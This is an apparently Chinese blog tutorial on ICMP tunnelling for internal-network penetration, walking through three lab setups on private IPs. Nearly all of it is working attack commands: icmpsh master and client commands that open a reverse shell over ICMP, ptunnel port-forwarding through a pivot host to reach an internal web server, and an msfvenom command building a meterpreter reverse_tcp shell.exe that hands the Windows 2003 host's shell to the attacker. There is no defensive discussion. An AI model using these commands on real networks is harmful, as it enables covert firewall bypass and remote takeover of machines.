icmp隧道

内网渗透时,如果防火墙只允许ICMP流量通过,可以使用ICMP隧道技术。
缺点:需要root/administrator权限。

环境一

kali通过icmp隧道获得2003的shell

  • kali,192.168.1.104
  • 2003,192.168.1.105
  1. kali上执行
git clone https://github.com/inquisb/icmpsh.git
apt-get install python-impacket
sysctl -w net.ipv4.icmp_echo_ignore_all=1
python icmpsh_m.py 192.168.1.104 192.168.1.105
  1. 2003上执行
icmpsh.exe -t 192.168.1.104 -d 500 -b 30 -s 128
  1. kali获得2003的shell
icmp隧道_第1张图片
image.png

环境二

使用kali访问2003的web服务,ptunnel下载地址:
https://pkgs.org/download/ptunnel

  • kali,192.168.1.104
  • 2003,192.168.10.134
  • centos,192.168.1.102和192.168.10.136
  1. centos上执行
rpm -ivh ptunnel-0.70-1.el6.rf.i686.rpm 安装ptunnel
sysctl -w net.ipv4.icmp_echo_ignore_all=1
ptunnel -x 123 开启icmp隧道服务端,密码123
  1. kali上执行
-p  指定icmp隧道服务端ip
-lp  指定本地转发端口
-da  指定要访问的机器ip
-dp  指定要访问的机器端口
ptunnel -p 192.168.1.102 -lp 1080 -da 192.168.10.134 -dp 80 -x 123

此时,访问kali的1080端口,相当于访问2003的80端口。

icmp隧道_第2张图片
image.png

环境三

将2003的shell反弹到kali上

  • kali,192.168.1.104
  • 2003,192.168.10.134
  • centos,192.168.1.102和192.168.10.136
  1. kali上执行
ptunnel -x 123
  1. centos上执行
ptunnel -p 192.168.1.104 -lp 1080 -da 192.168.1.104 -dp 4444 -x 123
  1. kali上生成shell.exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.136 LPORT=1080 -f exe > shell.exe

在2003上执行shell.exe,kali成功接收到2003的shell

icmp隧道_第3张图片
image.png

你可能感兴趣的:(icmp隧道)